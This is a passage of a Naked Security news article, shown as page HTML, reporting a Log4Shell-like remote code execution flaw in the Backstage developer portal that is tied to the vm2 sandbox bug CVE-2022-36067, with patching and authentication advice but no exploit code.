<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="RHQeasQqjasbRt5asY6atZYbs5tr10gFBevDt2HRhW0" />
<link rel="pingback" href="https://nakedsecurity.sophos.com/xmlrpc.php">
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-5VK6LTK');</script>
<!-- End Google Tag Manager -->

<meta name="description" content="Good old &quot;string templating&quot;, also known as &quot;string interpolation&quot;, in the spotlight again..." />
<meta name="keywords" content="vulnerability, backstage, cve-2022-36067" />
<title>Log4Shell-like code execution hole in popular Backstage dev tool &#8211; Naked Security</title>
<meta name='robots' content='max-image-preview:large' />
<!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="I9dHFo-YhnK2MfAHn-20V4GnWrOttVUYyISGamyU41M" />
<meta name="msvalidate.01" content="7D8D1FA2892142B1543D2CBCD07FB88F" />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Naked Security &raquo; Feed" href="https://nakedsecurity.sophos.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Naked Security &raquo; Comments Feed" href="https://nakedsecurity.sophos.com/comments/feed/" />
<link rel='stylesheet' id='all-css-0' href='https://nakedsecurity.sophos.com/_static/??-eJyNj9EOgjAMRX/I0ZAA+mL8ltE1UC1jWUfM/t6B0UDig4+3vae9F57BsEdZHCmgKjjWBL3M+DDCfbQxg6YsVE3sq2I4wZ64K0zk2JLQRD4dRBCbKRqhwWL+Dy+7vT5AOPu0vVhMkGVgr6BkI45AYjUxhkif/GuRWMaJnAmzJjXvRlsT/Z1lZbBcUkaTxvL/67tN17rrLm1TN+f2BSeIce4=' type='text/css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='global-styles-inline-css'>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</style>
<link rel='stylesheet' id='all-css-2' href='https://nakedsecurity.sophos.com/_static/??-eJyNzEsOwjAMRdEN4ZgUEjFBrMUKFgHysWpHFbunCGZMOn069+EikHozboaWubKidsldGy8K094HVHsVdkl1hxsxFDJW29qsDOnqLM9MBnmseHZU5a+vA6SM270pPtiE0hO8d9+D3/BpLvXsYzyFcIjH6Q11/lB9' type='text/css' media='all' />
<script type="text/javascript" src="https://nakedsecurity.sophos.com/_static/??-eJzTLy/QzcxLzilNSS3WzwKiwtLUokoopZebmaeXVayjj0+Rbm5melFiSSpUsX2uraGZmYWpiaGJuWkWAK+lIic=" ></script><link rel="https://api.w.org/" href="https://nakedsecurity.sophos.com/wp-json/" /><link rel="alternate" type="application/json" href="https://nakedsecurity.sophos.com/wp-json/wp/v2/posts/804269" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://nakedsecurity.sophos.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://nakedsecurity.sophos.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 6.1.1" />
<link rel="canonical" href="https://nakedsecurity.sophos.com/2022/11/15/log4shell-like-code-execution-hole-in-popular-backstage-dev-tool/" />
<link rel='shortlink' href='https://nakedsecurity.sophos.com/?p=804269' />
<link rel="alternate" type="application/json+oembed" href="https://nakedsecurity.sophos.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnakedsecurity.sophos.com%2F2022%2F11%2F15%2Flog4shell-like-code-execution-hole-in-popular-backstage-dev-tool%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://nakedsecurity.sophos.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnakedsecurity.sophos.com%2F2022%2F11%2F15%2Flog4shell-like-code-execution-hole-in-popular-backstage-dev-tool%2F&#038;format=xml" />
	<style>img#wpstats{display:none}</style>
		<link rel="amphtml" href="https://nakedsecurity.sophos.com/2022/11/15/log4shell-like-code-execution-hole-in-popular-backstage-dev-tool/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Log4Shell-like code execution hole in popular Backstage dev tool" />
<meta property="og:url" content="https://nakedsecurity.sophos.com/2022/11/15/log4shell-like-code-execution-hole-in-popular-backstage-dev-tool/" />
<meta property="og:description" content="Good old &#8220;string templating&#8221;, also known as &#8220;string interpolation&#8221;, in the spotlight again&#8230;" />
<meta property="article:published_time" content="2022-11-15T17:49:49+00:00" />
<meta property="article:modified_time" content="2022-11-16T01:16:31+00:00" />
<meta property="og:site_name" content="Naked Security" />
<meta property="og:image" content="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?w=775" />
<meta property="og:image:secure_url" content="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?w=775" />
<meta property="og:image:width" content="775" />
<meta property="og:image:height" content="405" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta property="fb:admins" content="28552295016" />
<meta name="twitter:creator" content="@NakedSecurity" />
<meta name="twitter:site" content="@NakedSecurity" />
<meta name="twitter:text:title" content="Log4Shell-like code execution hole in popular Backstage dev tool" />
<meta name="twitter:image" content="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2020/03/cropped-sophos.png?w=32" sizes="32x32" />
<link rel="icon" href="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2020/03/cropped-sophos.png?w=192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2020/03/cropped-sophos.png?w=180" />
<meta name="msapplication-TileImage" content="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2020/03/cropped-sophos.png?w=270" />
</head>
<body class="post-template-default single single-post postid-804269 single-format-standard" >
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5VK6LTK"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<div style="display: none">
<svg>
	<symbol id="sophos" viewBox="0 0 132 24">
		<path d="m111.82 22.176h11.64c3.267 0 4.65-0.2 5.74-0.896 1.715-1.063 2.804-3.26 2.804-5.62 0-1.928-0.658-3.89-1.647-4.888-1.288-1.33-3.035-1.828-6.271-1.828h-3.527c-1.586 0-2.754-0.067-3.412-0.365-0.794-0.367-1.256-1.165-1.256-2.161 0-1.165 0.56-2.03 1.486-2.264 0.692-0.163 1.498-0.163 3.574-0.198h10.419v-3.956h-11.473c-2.574 0-3.727 0.099-4.718 0.466-2.279 0.796-3.828 3.257-3.828 6.083 0 1.93 0.76 3.727 2.079 4.89 1.155 0.996 2.872 1.462 5.51 1.462h4.697c1.057 0 1.915 0.132 2.376 0.398 0.893 0.433 1.418 1.328 1.418 2.36 0 0.864-0.395 1.597-1.087 2.027-0.561 0.369-1.517 0.534-3.268 0.534h-11.256zm-111.35 0h11.64c3.267 0 4.652-0.2 5.741-0.896 1.714-1.063 2.803-3.26 2.803-5.62 0-1.928-0.66-3.89-1.65-4.888-1.285-1.33-3.034-1.828-6.27-1.828h-3.527c-1.584 0-2.751-0.067-3.41-0.365-0.792-0.367-1.253-1.165-1.253-2.161 0-1.165 0.56-2.03 1.484-2.264 0.693-0.163 1.496-0.163 3.574-0.198h10.42v-3.956h-11.477c-2.573 0-3.727 0.099-4.715 0.466-2.278 0.796-3.83 3.257-3.83 6.083 0 1.93 0.762 3.727 2.08 4.89 1.155 0.996 2.871 1.462 5.51 1.462h4.696c1.057 0 1.913 0.132 2.377 0.398 0.888 0.433 1.416 1.328 1.416 2.36 0 0.864-0.394 1.597-1.089 2.027-0.558 0.369-1.517 0.534-3.264 0.534h-11.256v3.956zm94.05-16.18c-0.68 1.076-1.003 2.803-1.003 5.122 0 5.088 1.747 7.405 5.63 7.405 3.822 0 5.568-2.317 5.568-7.34 0-5.092-1.715-7.373-5.568-7.373-2.102 0-3.754 0.784-4.627 2.186zm13.174-2.511c1.329 1.761 2.072 4.63 2.072 7.992 0 3.816-1.197 6.948-3.334 8.677-1.619 1.304-4.078 2.022-6.995 2.022-4.142 0-7.41-1.372-9.092-3.817-1.263-1.793-1.88-4.176-1.88-7.08 0-4.172 1.133-7.339 3.27-9.035 1.682-1.37 4.339-2.122 7.383-2.122 3.85 0 6.925 1.209 8.576 3.363zm-22.018-3.068h-4.596v8.908h-8.319v-8.908h-4.597v21.759h4.597v-8.97h8.318v8.97h4.596v-21.759zm-28.61 10.277c1.23 0 1.941-0.163 2.427-0.62 0.581-0.49 0.938-1.533 0.938-2.74 0-1.436-0.58-2.478-1.584-2.838-0.356-0.13-0.94-0.197-1.684-0.197h-6.344v6.395zm-6.247 11.481h-4.598v-21.758h10.78c3.786 0 5.114 0.39 6.538 1.991 1.264 1.37 1.942 3.163 1.942 5.088 0 2.284-0.904 4.404-2.394 5.676-1.262 1.077-2.43 1.402-4.888 1.402h-7.38zm-22.589-16.179c-0.682 1.076-1.004 2.803-1.004 5.122 0 5.088 1.748 7.405 5.634 7.405 3.818 0 5.568-2.317 5.568-7.34 0-5.092-1.716-7.373-5.568-7.373-2.106 0-3.757 0.784-4.63 2.186zm13.174-2.511c1.328 1.761 2.073 4.63 2.073 7.992 0 3.816-1.2 6.948-3.335 8.677-1.618 1.304-4.079 2.022-6.993 2.022-4.144 0-7.413-1.372-9.096-3.817-1.264-1.793-1.878-4.176-1.878-7.08 0-4.172 1.133-7.339 3.272-9.035 1.681-1.37 4.337-2.122 7.38-2.122 3.851 0 6.93 1.209 8.578 3.363z"></path>
	</symbol>
	<symbol id="twitter" viewBox="0 0 24 24">
 		<path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"></path>
 	</symbol>
	<symbol id="facebook" viewBox="0 0 24 24">
 		<path d="M9 8h-3v4h3v12h5v-12h3.642l.358-4h-4v-1.667c0-.955.192-1.333 1.115-1.333h2.885v-5h-3.808c-3.596 0-5.192 1.583-5.192 4.615v3.385z"></path>
 	</symbol>
	<symbol id="instagram" viewBox="0 0 24 24">
		<path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"></path>
	</symbol>
	<symbol id="linkedin" viewBox="0 0 24 24">
		<path d="M4.98 3.5c0 1.381-1.11 2.5-2.48 2.5s-2.48-1.119-2.48-2.5c0-1.38 1.11-2.5 2.48-2.5s2.48 1.12 2.48 2.5zm.02 4.5h-5v16h5v-16zm7.982 0h-4.968v16h4.969v-8.399c0-4.67 6.029-5.052 6.029 0v8.399h4.988v-10.131c0-7.88-8.922-7.593-11.018-3.714v-2.155z"></path>
	</symbol>
	<symbol id="rss" viewBox="0 0 24 24">
		<path d="M6.503 20.752c0 1.794-1.456 3.248-3.251 3.248-1.796 0-3.252-1.454-3.252-3.248 0-1.794 1.456-3.248 3.252-3.248 1.795.001 3.251 1.454 3.251 3.248zm-6.503-12.572v4.811c6.05.062 10.96 4.966 11.022 11.009h4.817c-.062-8.71-7.118-15.758-15.839-15.82zm0-3.368c10.58.046 19.152 8.594 19.183 19.188h4.817c-.03-13.231-10.755-23.954-24-24v4.812z"></path>
	</symbol>
	<symbol id="reddit" viewBox="0 0 24 24">
		<path d="M24 11.779c0-1.459-1.192-2.645-2.657-2.645-.715 0-1.363.286-1.84.746-1.81-1.191-4.259-1.949-6.971-2.046l1.483-4.669 4.016.941-.006.058c0 1.193.975 2.163 2.174 2.163 1.198 0 2.172-.97 2.172-2.163s-.975-2.164-2.172-2.164c-.92 0-1.704.574-2.021 1.379l-4.329-1.015c-.189-.046-.381.063-.44.249l-1.654 5.207c-2.838.034-5.409.798-7.3 2.025-.474-.438-1.103-.712-1.799-.712-1.465 0-2.656 1.187-2.656 2.646 0 .97.533 1.811 1.317 2.271-.052.282-.086.567-.086.857 0 3.911 4.808 7.093 10.719 7.093s10.72-3.182 10.72-7.093c0-.274-.029-.544-.075-.81.832-.447 1.405-1.312 1.405-2.318zm-17.224 1.816c0-.868.71-1.575 1.582-1.575.872 0 1.581.707 1.581 1.575s-.709 1.574-1.581 1.574-1.582-.706-1.582-1.574zm9.061 4.669c-.797.793-2.048 1.179-3.824 1.179l-.013-.003-.013.003c-1.777 0-3.028-.386-3.824-1.179-.145-.144-.145-.379 0-.523.145-.145.381-.145.526 0 .65.647 1.729.961 3.298.961l.013.003.013-.003c1.569 0 2.648-.315 3.298-.962.145-.145.381-.144.526 0 .145.145.145.379 0 .524zm-.189-3.095c-.872 0-1.581-.706-1.581-1.574 0-.868.709-1.575 1.581-1.575s1.581.707 1.581 1.575-.709 1.574-1.581 1.574z"></path>
	</symbol>
</svg>
</div>
<div id="page" class="hfeed site">
	<a class="skip-link screen-reader-text" href="#content">Skip to content</a>

	
	<header id="masthead" class="site-header variation variation-3" role="banner">
		<div class="header-container">
			<div class="site-branding">
				<div class="site-title">
					<a title="Naked Security" href="https://nakedsecurity.sophos.com/" rel="home"><img src="https://nakedsecurity.sophos.com/wp-content/themes/sophosnews-2015/img/naked-security-logo-white@2x.png"></a>
					by
					<a title="sophos.com" href="https://www.sophos.com"><svg viewBox="0 0 132 24" class="icon sophos"><use xlink:href="#sophos"></use></svg></a>
				</div>
			</div><!-- .site-branding -->
			<nav id="site-navigation" class="main-navigation" role="navigation">
				<div class="container">
					<ul id="menu-variation-two" class="exit-links menu"><li id="menu-item-436509" class="products menu-item menu-item-type-custom menu-item-object-custom menu-item-436509"><a href="https://www.sophos.com/en-us/products">Products</a></li>
<li id="menu-item-436515" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-436515"><a href="https://www.sophos.com/en-us/products/free-tools.aspx">Free Tools</a></li>
<li id="menu-item-436531" class="search-toggle menu-item menu-item-type-custom menu-item-object-custom menu-item-436531"><a href="#">Search</a></li>
<li id="menu-item-436532" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-436532"><a href="https://home.sophos.com/en-us.aspx">Free Sophos Home</a></li>
</ul>				</div>
			</nav><!-- #site-navigation -->
			<div class="site-search-block">
	<form target="_top" role="search" class="search-form" method="get" action="https://nakedsecurity.sophos.com/">
        <fieldset>
            <div class="field">
				<input type="search" value="" name="s" class="search-field" placeholder="Search naked security...">
            </div>
            <div class="submit">
				<button type="submit" class="search-submit button">Go</button>
            </div>
        </fieldset>
    </form>
</div>
		</div><!-- .container -->
	</header>

	<div class="responsive-flyout-panel small-12 column active" style="opacity: 1; display: none;">
		<div class="modal-filler"></div>
	    <div class="productNavBox">
	        <div class="productNavContainer">
	            <div class="row prodRow">
	                <div class="prodListBox column large-9">
	                    <div class="row margin-0 highlightProduct">
	                        <div class="column medium-6">
	                            <a href="https://www.sophos.com/products/next-gen-firewall.aspx"><img src="https://www.sophos.com/medialibrary/2F4785DE8C3F43ECBD699A18F332FEEB.ashx">
	                                <div class="menu-section-header">
										<div class="menu-section-title">XG Firewall</div>
	                                	<div class="menu-section-subtitle">Next-Gen Firewall</div>
									</div>
	                            </a>
	                        </div>
	                        <div class="column medium-6">
	                            <a href="https://www.sophos.com/products/intercept-x.aspx"><img src="https://www.sophos.com/medialibrary/27111765D65A45D49A232925D2CE428B.ashx">
	                                <div class="menu-section-header">
										<div class="menu-section-title">Intercept X</div>
	                                	<div class="menu-section-subtitle">Next-Gen Endpoint</div>
									</div>
	                            </a>
	                        </div>
	                    </div>
	                    <div class="productList">
	                        <ul>
								<li>
									<a href="https://www.sophos.com/en-us/products/cloud-optix.aspx"><img src="https://www.sophos.com/medialibrary/SophosNext/Images/Products/Icons/sophos-cloud-optix-icon.svg">Sophos Cloud Optix</a>
								</li>
	                            <li>
	                                <a href="https://www.sophos.com/products/sophos-central.aspx"><img src="https://www.sophos.com/medialibrary/08EA66123F1B4DDE8FE5C9B578A7FAA7.ashx">Sophos Central</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/mobile-control.aspx"><img src="https://www.sophos.com/medialibrary/678FE994855047739F50D6C411184FA6.ashx">Sophos Mobile</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/server-security.aspx"><img src="https://www.sophos.com/medialibrary/01B80E7D7CD54EF8AC2E51C9C6EC0236.ashx">Intercept X for Server</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/secure-wifi.aspx"><img src="https://www.sophos.com/medialibrary/BEBD9C41BB4E480498514B29B92A145A.ashx">Secure Wi-Fi</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/phish-threat.aspx"><img src="https://www.sophos.com/medialibrary/DC9D1A7BA3964B0C9DAF1F1E68806B5A.ashx">Phish Threat</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/safeguard-encryption.aspx"><img src="https://www.sophos.com/medialibrary/8F51F06B62814B108D3B2763FF018E37.ashx">SafeGuard Encryption</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/sophos-email.aspx"><img src="https://www.sophos.com/medialibrary/597ADA0AF01A4A12B2B27239D0F9992C.ashx">Secure Email</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/unified-threat-management.aspx"><img src="https://www.sophos.com/medialibrary/8CB72BF5E1AD41F7894CE5E42101B0F3.ashx">SG UTM</a>
	                            </li>
	                            <li>
	                                <a href="https://www.sophos.com/products/secure-web-gateway.aspx"><img src="https://www.sophos.com/medialibrary/C586E372694547A1B207A61D87246BA7.ashx">Secure Web Gateway</a>
	                            </li>
	                        </ul>
	                    </div>
	                </div>
	                <div class="homeUserBox column large-3">
						<img src="https://www.sophos.com/medialibrary/3376DF5742A64AEE93FDB9DCA7291239.ashx">
						<div class="menu-section-title">For Home Users</div>
	                    <p>Sophos Home protects every Mac and PC in your home </p><a href="https://home.sophos.com/" target="_blank" class="greenSmallMenuBtn">Learn More</a>
					</div>
	            </div>
	            <div class="row blueRow">
	                <div class="column large-3 medium-6">
	                    <a href="https://www.sophos.com/products/free-tools.aspx"><img width="19" src="https://www.sophos.com/medialibrary/A1FF440D2BB84511B8C94D771D44E207.ashx">Free Security Tools</a>
	                </div>
	                <div class="column large-3 medium-6">
	                    <a href="https://www.sophos.com/products/free-trials.aspx"><img width="20" src="https://www.sophos.com/medialibrary/FCD3410ED2C347808D9DB8AC12C62DBD.ashx">Free Trials</a>
	                </div>
	                <div class="column large-3 medium-6">
	                    <a href="https://www.sophos.com/products/demos.aspx"><img width="18" src="https://www.sophos.com/medialibrary/50985180E5F54C94917A2A6508E24287.ashx">Product Demos</a>
	                </div>
	                <!-- <div class="column large-3 medium-6">
	                    <a href="javascript:fairfax.openLiveChatFromFlyoutLink();" class="flyout-live-chat-link"><img width="20" src="https://www.sophos.com/medialibrary/E24C5050837145F6A5C592E299BA2A0D.ashx">Live Sales Chat</a>
	                </div> -->
	            </div>
	        </div>
	    </div>
	</div>
	<script>

	jQuery(document).ready( function () {
		var productButton   = jQuery('nav .menu-item.products');
		var modalBackground = jQuery('.modal-filler');
		var flyoutMenu		= jQuery('.responsive-flyout-panel');
		var Sophos			= Sophos || {};

		Sophos.MenuTest = {};

		Sophos.MenuTest.open = function () {
				productButton.addClass('open');
				flyoutMenu.show();
				modalBackground.show();
		};

		Sophos.MenuTest.close = function () {
			productButton.removeClass('open');
			flyoutMenu.hide();
			modalBackground.hide();
		};

		Sophos.MenuTest.toggle = function () {
			if ( productButton.hasClass('open') ) {
				Sophos.MenuTest.close();
			} else {
				Sophos.MenuTest.open();
			}
		};

		// productButton.click( Sophos.MenuTest.toggle );
		// modalBackground.click( Sophos.MenuTest.close );
	});

	</script>

	
	<section class="about-panel">
	<div class="container">
	<div class="panel-content ">

		<div class="description"><span>Have you listened to our podcast? <a href="/podcast/">Listen now</a></span></div>

	</div> <!-- .panel-container -->
	</div> <!-- .container -->
	</section> <!-- .panel -->

	
	<div id="content" class="site-content">
		<div class="content-container">

</div> <!-- .container -->
</div> <!-- #content -->


	<section class="content-panel">
	<div class="container">
	<div class="panel-content framed-content-area">

		<main id="main" class="site-main" role="main">

	
		
<article id="post-804269" class="post-804269 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-vulnerability tag-backstage tag-cve-2022-36067">

	<header class="entry-header">
		<h1 class="entry-title">Log4Shell-like code execution hole in popular Backstage dev tool</h1>		<div class="entry-meta">
			<div>
				
	<span class="entry-published">
		<time class="entry-date published" datetime="2022-11-15T17:49:49+00:00">15 Nov 2022</time>
	</span>

					<a href="#comments" class="comment-box">
					<span class="count">0</span>
				</a>
					
	<span class="entry-categories">
	<a href="https://nakedsecurity.sophos.com/category/security-threats/vulnerability/">Vulnerability</a>	</span>

			</div>
	</header> <!-- .entry-header -->

    <div id="newsletter-signup" class="container top"></div>

			<div class="entry-featured-image">
			<img width="780" height="408" src="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?w=780&amp;h=408&amp;crop=1" class="attachment-hero-thumbnail size-hero-thumbnail wp-post-image" alt="" decoding="async" srcset="https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png 1200w, https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?resize=300,157 300w, https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?resize=768,401 768w, https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?resize=1024,535 1024w, https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?resize=780,408 780w, https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/bs-1200-1.png?resize=100,52 100w" sizes="(max-width: 780px) 100vw, 780px" />					</div> <!-- .entry-featured-image -->
		
		<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Post navigation</h2>

		<div class="nav-links">
			<div class="nav-previous"><a href="https://nakedsecurity.sophos.com/2022/11/14/gucci-master-business-email-scammer-hushpuppi-gets-11-years/" rel="prev"><span class="nav-label">Previous</span><span class="nav-seperator">:</span><span class="nav-title"> &#8220;Gucci Master&#8221; business email scammer Hushpuppi gets 11 years</span></a></div>		</div>
		<!-- .nav-links -->
	</nav><!-- .navigation -->
	
	<div class="entry-content">
		<div class="entry-prefix">
			<div class="entry-author">
				
	
					<span class="by">by</span>
			<a href="https://nakedsecurity.sophos.com/author/paul-ducklin/" title="Posts by Paul Ducklin" class="author url fn" rel="author">Paul Ducklin</a>		
	
				</div>
			<div class="entry-sharing">
				
	<ul class="block social share">
		<li class="facebook"><a href="https://www.facebook.com/share.php?u=https%3A%2F%2Fnakedsecurity.sophos.com%2F2022%2F11%2F15%2Flog4shell-like-code-execution-hole-in-popular-backstage-dev-tool%2F&title=Log4Shell-like+code+execution+hole+in+popular+Backstage+dev+tool" data-title="Log4Shell-like code execution hole in popular Backstage dev tool" title="Share on Facebook"><svg style="height: 20px;" viewBox="0 0 100 100" class="icon facebook"><use xlink:href="#facebook"></use></svg></a></li>
		<li class="twitter"><a href="https://twitter.com/intent/tweet?text=Log4Shell-like+code+execution+hole+in+popular+Backstage+dev+tool+https%3A%2F%2Fnakedsecurity.sophos.com%2F%3Fp%3D804269" data-title="Log4Shell-like code execution hole in popular Backstage dev tool" title="Share on Twitter"><svg style="height: 20px;" viewBox="0 0 100 100" class="icon twitter"><use xlink:href="#twitter"></use></svg></a></li>
		<li class="linkedin"><a href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fnakedsecurity.sophos.com%2F2022%2F11%2F15%2Flog4shell-like-code-execution-hole-in-popular-backstage-dev-tool%2F&title=Log4Shell-like+code+execution+hole+in+popular+Backstage+dev+tool" data-title="Log4Shell-like code execution hole in popular Backstage dev tool" title="Share on LinkedIn"><svg style="height: 20px;"  viewBox="0 0 100 100" class="icon linkedin"><use xlink:href="#linkedin"></use></svg></a></li>
		<li class="reddit"><a href="https://reddit.com/submit/?url=https%3A%2F%2Fnakedsecurity.sophos.com%2F2022%2F11%2F15%2Flog4shell-like-code-execution-hole-in-popular-backstage-dev-tool%2F&title=Log4Shell-like+code+execution+hole+in+popular+Backstage+dev+tool" title="Share on Reddit"><svg style="height: 20px;"  viewBox="0 0 100 100" class="icon reddit"><use xlink:href="#reddit"></use></svg></a></li>

			</ul>

				</div>
		</div>
		<p>Researchers at cloud coding security company Oxeye have written up a critical bug that they recently discovered in the popular cloud development toolkit Backstage.</p>
<p>Their <a href="https://www.oxeye.io/blog/remote-code-execution-in-spotifys-backstage" rel="nofollow">report</a> includes an explanation of how the bug works, plus proof-of-concept (PoC) code showing how to exploit it.</p>
<p>Backstage is what&#8217;s known as a cloud developer portal &#8211; a sort of business logic backend that makes it easy to build web-based APIs (application programming interfaces) to allow coders inside and outside your business to interact with your online services.</p>
<p>In the words of the project itself, originally created at Spotify but now <a href="https://github.com/backstage/backstage" rel="nofollow">open-sourced</a> on GutHub:</p>
<blockquote><p>Backstage is an open platform for building developer portals. Powered by a centralized software catalog, Backstage restores order to your microservices and infrastructure and enables your product teams to ship high-quality code quickly — without compromising autonomy.</p>
<p>Backstage unifies all your infrastructure tooling, services, and documentation to create a streamlined development environment from end to end.</p></blockquote>
<p>No, we don&#8217;t truly know what that means, either, but we do know that the toolkit is written in JavaScript, runs using the server-side JavaScript system <code>node.js</code>, and draws in a web of supply chain dependencies from the NPM ecosystem.</p>
<p>NPM is short for <em>Node Package Manager</em>, an automated toolkit for ensuring that your back-end JavaScript code can easily make use of a wide range of open source libraries that provide popular, pre-written helper tools for everything from cryptography and database management to logging and version control.</p>
<h2>Remote code execution</h2>
<p>Unfortunately, the bug disclosed today, if unpatched, could give unauthenticated outsiders (loosely, anyone who can make API connections to your servers) a way to trigger remote code execution (RCE) inside the business-logic servers on your network.</p>
<p>Fortunately, however, if we have interpreted Oxeye&#8217;s writeup correctly, the attack they describe for their Backstage RCE depends on a sequence of coding flaws that ultimately depend on a specific bug, designated <b>CVE-2022-36067</b> in a supply-chain component that Backstage relies on called vm2.</p>
<p>In case you&#8217;re wondering, vm2 is a general-purpose NPM module that implements a &#8220;virtual machine sandbox&#8221; that aims to make potentially risky JavaScript a bit safer to run on your servers.</p>
<p>That CVE-2022-36067 bug in vm2 was <a href="https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067" rel="nofollow">reported</a> back in August 2022 by Oxeye itself (who gave it a PR-friendly name of &#8220;Sandbreak&#8221;, because it broke out of the sandbox), and <a href="https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq">patched promptly</a> by the vm2 team almost three months ago.</p>
<p>So, as far as we can see, if you&#8217;re a Backstage user you will want to make sure that you have patched all at-risk components in your Backstage setup&#8230;</p>
<p>&#8230;but if you patched the vm2 component that was vulnerable to Sandbreak all those months ago, then it seems you aren&#8217;t directly vulnerable to the exploit described in Oxeye&#8217;s latest disclosure.</p>
<p>Also, if your Backstage servers are configured as good cybersecurity guidelines would suggest, with authentication required at both the network edge and inside the network, you won&#8217;t be at risk of random &#8220;for researcher purposes only&#8221; probes from &#8220;helpful&#8221; individuals determined to show that they are interested in cyberthreat &#8220;research&#8221;.</p>
